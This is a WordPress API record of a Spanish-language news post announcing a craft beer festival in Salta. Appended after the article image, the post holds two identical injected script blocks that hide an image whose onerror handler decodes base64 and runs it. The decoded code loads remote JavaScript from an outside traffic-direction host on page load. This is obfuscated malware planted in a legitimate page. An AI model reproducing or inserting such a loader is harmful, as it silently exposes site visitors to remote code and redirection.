{"id":1947,"date":"2022-12-14T14:50:52","date_gmt":"2022-12-14T17:50:52","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1947"},"modified":"2025-08-14T00:27:54","modified_gmt":"2025-08-14T03:27:54","slug":"realizaran-el-1er-festival-de-la-cerveza-artesanal-saltena-en-el-paseo-ameghino","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1947","title":{"rendered":"Realizar\u00e1n el 1er Festival de la Cerveza Artesanal Salte\u00f1a en el Paseo Ameghino"},"content":{"rendered":"\n<h5 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#8f0d2d\"><strong><em>La convocatoria es para el s\u00e1bado 17, desde las 12. Habr\u00e1 bandas en vivo, Food Truck, sorteos, juegos y DJ en vivo a lo largo de la jornada. Participar\u00e1n cerveceros, productores de Gin e Hidromiel locales. La actividad cuenta con el acompa\u00f1amiento de la Municipalidad y la entrada es gratuita.<\/em><\/strong><\/h5>\n\n\n\n<p>La Municipalidad de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, acompa\u00f1a a la Primera Edici\u00f3n del Festival de la Cerveza Artesanal Salte\u00f1a, que se llevar\u00e1 a cabo este s\u00e1bado 17 de diciembre, desde las 12 del mediodia hasta las 00.&nbsp;La cita es en el Paseo Ameghino.<\/p>\n\n\n\n<p>La jornada contar\u00e1 con la presencia de m\u00e1s de 8 bandas de m\u00fasica, gastronom\u00eda, sorteos, juegos y con la DJ Bardy Mix -en vivo- a lo largo de toda la jornada.&nbsp; La entrada ser\u00e1 libre y gratuita.<\/p>\n\n\n\n<p>El organizador del festival, Leo Goldbert, se\u00f1al\u00f3 que:&nbsp; \u201cBuscamos que los vecinos y visitantes la pasen bien, y vivan la previa de la final de la Copa del Mundo. En este marco, la ornamentaci\u00f3n, las bandas y los puestos tendr\u00e1n los colores celeste y blanco. Invitamos a sumarse y&nbsp; disfrutar de esta propuesta, y acompa\u00f1os a la selecci\u00f3n todos vestidos de celeste y blanco\u00bb<\/p>\n\n\n\n<p>Participar\u00e1n en esta edici\u00f3n 14 cerveceros, 8 gastron\u00f3micos, 1 productor de gin y 2 de hidromiel. Todo artesanal, emprendedores y productores locales.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/prensa.municipalidadsalta.gob.ar\/wp-content\/uploads\/2022\/12\/whatsapp-image-2022-12-14-at-131345.jpeg\" alt=\"\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La convocatoria es para el s\u00e1bado 17, desde las 12. Habr\u00e1 bandas en vivo, Food Truck, sorteos, juegos y DJ en vivo a lo largo de la jornada. Participar\u00e1n cerveceros, productores de Gin e Hidromiel locales. La actividad cuenta con el acompa\u00f1amiento de la Municipalidad y la entrada es gratuita. La Municipalidad de Salta, a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1948,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,13],"tags":[],"class_list":{"0":"post-1947","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1947"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1947"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1947\/revisions"}],"predecessor-version":[{"id":7242,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1947\/revisions\/7242"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1948"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1947"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1947"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1947"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}